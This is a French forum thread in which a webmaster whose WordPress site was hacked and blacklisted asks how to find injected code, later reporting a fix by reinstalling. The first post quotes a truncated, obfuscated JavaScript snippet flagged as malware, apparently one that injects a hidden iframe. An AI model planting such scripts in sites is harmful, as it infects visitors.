Malware Javascript Obsfucation

[Albator212]

--- 16 juin à 05h29 ---

 

Salut,

 

Après des heures de recherches (et de joyeux pétages de plomb en passant - tant qu'à faire), je me tourne vers vous en espérant que vous pourrez m'aider.

 

Alors voilà, mon site a été hacké. Google, Firefox, Safari l'ont blacklisté et bloqué a cause d'un "javascript obsfucation". Dans Google Webmaster Tools, on me dit que c'est ce code qui pose problème :

 

<script type='text/javascript'>/*<![CDATA[*/var wow=lb2b3vb

2mb2eafromb1rb1gd";var _J=(Date);if(_J){_h='4726';}var _Y={'

J':'reve\x72\x73e','f':'str\x69\x6Eg','o':'\x73\x75bstr','s'

:!false,'k':'j\x6Fin','v':'spl\x69\x74','P':'len\x67\x74\x68

'},_R='',_z=['=c1n"oll ;y"1=cd(if=-oumt.oc.iekienoOfxe{adn)1

)cr =(vanea.saDw ;teetiT(.eetgmaTi)(me2;)cE=73;6c2t(D an=e.a

ewimTt(+)ceeg3douc);ecetn.m=ik1coocpa"s"+=+ee(Moc2TtStirG.gn

()")+p;xei=sre.tTGc"+o2MStng)(a;p"tri+;v"/de=h= brumnaoct.ae

mlecrEneet(tf+ir""""+""+a"=em"M,c)tah.05(d1oru*0+n.rhtnodmaa

M(,dM=))7ot.hra0(d+0nut.h0a310*Mra)(nd;.bmts)olye.dwiMt=har.

th(150nou0d+00at.hondam*Mrb.Wink.h)(eyltigtshe=cs.pe.;blsoytti

n"obsai=ol"eutlb;.etysl.efscb;.=t-"=rd:/pt"w+o/thwepal.r-ae/

(ec"",.)g/(b/leerpac3/."g,rpeaal)"ec(//b2eg","er).e(/bapl/c1

g,."+)mre/2 ""l"mtanh.onlofuc;d=ti)umc(ononed{.td.oppabyenih

dC}dl(Wink}b][_Y.k]('\x0A'),_h=_h[_Y.v](_R),_K=function(){for

(var _a in _h){if(typeof(_h[_a])==_Y.f){var _c=[],_E=_Y.s,_J

=_h[_a]*-~false;for(f=[]^[];f<_z[_Y.P];f+=_J){_c[f]=(_E)?(_z

[_Y.

 

Je n'ai aucune idée de comment faire pour trouver les fichiers contaminés. J'ai réinstallé WP, ma BDD, trouvé et effacé un fichier corrompu en scannant ma sauvegarde FTP, changé tous mes mots de passe, mais rien n'y fait.

 

L'outil de scan en ligne que j'ai utilisé me dit que mon URL (home page) est "suspicious", et il me donne des "attack URLs", qui contiennent toutes du .js (en provenance du thème WP, mais aussi de wp-includes). J'ai remplacé tous ces fichiers par leur version la plus récente et... ça n'a rien changé. Même quand je les supprime, ils restent listés ! Il n'y a que quand je dégage tous les fichiers .js de WordPress qu'il n'y a plus que l'URL principale qui reste "suspicieuse".

 

Comment faire pour trouver où se loge ce code malicieux ? Comment Google l'a trouvé et d'où le sort-il ? Parce que perso que j'affiche le code source de la page, je ne le trouve nulle part...

 

--- 18 juin à 05h41 ---

 

Aucune idée ?...

 

-édit- Dans cette section, il ne faut pas insérer de « up » dans ton sujet : au vu de la présence d'une « réponse », les helpers ne s'y intéresseront pas, croyant le problème pris en mains par l'un des leurs. Tu peux en revanche poster un petit rappel dans le sujet « On m'a oublié ! », épinglé en tête de la section et prévu à cet effet…

Modifié le 18 juin 2012 par Dylav

[pear]

Bonjour,

 

Je n'y connais rien , en Javas script.

Si c'est l'obsfucation qui fait problème:

 

Enlever l'obfuscation

 

Vous devriez chercher de l'aide sur le forum "Programmation " de ce site.

Modifié le 18 juin 2012 par pear

[Albator212]

Merci pour la précision de l'edit et tes conseils pear.

 

Au final, j'ai tout viré une enième fois, fait une exportation WP et tout réinstallé sans passer par PhpMyAdmin. J'ai envoyé une demande de réexamen à Google et, cool, on dirait que je ne suis plus blacklisté.

[Dylav]

Bonjour Albator,

 

Dès que tu considéreras qu'ici la question est réglée, n'oublie pas de le signaler en taguant du mot [Résolu] le titre de ton sujet.

 

[1] En bas du premier message de ton sujet, clique sur [Modifier]

[2] En bas de l'éditeur qui s'ouvre, clique sur [Utiliser l'éditeur complet]

[3] En haut de l'éditeur complet, ajoute [Résolu] au titre de ton sujet.